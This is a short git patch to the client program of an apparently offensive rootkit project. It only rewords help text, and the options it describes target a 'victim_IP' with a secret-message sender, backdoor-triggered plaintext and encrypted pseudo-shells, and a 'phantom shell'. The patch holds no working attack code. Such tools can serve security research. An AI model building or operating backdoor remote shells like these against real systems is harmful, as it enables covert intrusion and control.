From b28458171260dda0d525b578e52e95fc5adabb2e Mon Sep 17 00:00:00 2001 From: h3xduck Date: Wed, 15 Jun 2022 17:48:21 -0400 Subject: [PATCH] Further changed some help in the client --- src/client/client.c | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/src/client/client.c b/src/client/client.c index fffd154..0be90d0 100644 --- a/src/client/client.c +++ b/src/client/client.c @@ -39,16 +39,16 @@ void print_help_dialog(const char* arg){ printf("\nUsage: %s OPTION victim_IP\n\n", arg); printf("Program OPTIONs\n"); char* line = "-S IP"; - char* desc = "Send a secret message to IP"; + char* desc = "Send a secret message to IP (PoC)"; printf("\t%-40s %-50s\n\n", line, desc); line = "-c IP"; - desc = "Activate C&C shell with IP - Using execve backdoor"; + desc = "Activate plaintext pseudo-shell with IP - Using execve backdoor"; printf("\t%-40s %-50s\n\n", line, desc); line = "-e IP"; - desc = "Activate encrypted C&C shell with IP - with pattern-based trigger"; + desc = "Activate encrypted pseudo-shell with IP - with pattern-based trigger"; printf("\t%-40s %-50s\n\n", line, desc); line = "-s IP"; - desc = "Activate encrypted C&C shell with IP - with multi-packet trigger"; + desc = "Activate encrypted pseudo-shell with IP - with multi-packet trigger"; printf("\t%-40s %-50s\n\n", line, desc); line = "-p IP"; desc = "Launch a phantom shell - with pattern-based trigger";